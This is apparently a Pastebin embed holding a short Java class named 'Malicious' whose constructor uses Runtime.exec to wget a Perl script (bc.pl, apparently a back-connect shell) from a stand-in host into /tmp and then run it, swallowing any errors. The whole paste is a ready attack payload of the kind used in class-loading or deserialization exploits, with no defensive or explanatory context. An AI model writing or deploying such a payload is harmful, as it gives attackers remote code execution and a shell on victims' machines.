document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. public class Malicious {
  2.        public Malicious() {
  3.               try {
  4.                      java.lang.Runtime.getRuntime().exec("wget http://yourhome.com/w/bc.pl -O /tmp/bc.pl");
  5.              java.lang.Runtime.getRuntime().exec("perl /tmp/bc.pl");
  6.               } catch (Exception e) {    
  7.               }
  8.        }
  9. }
');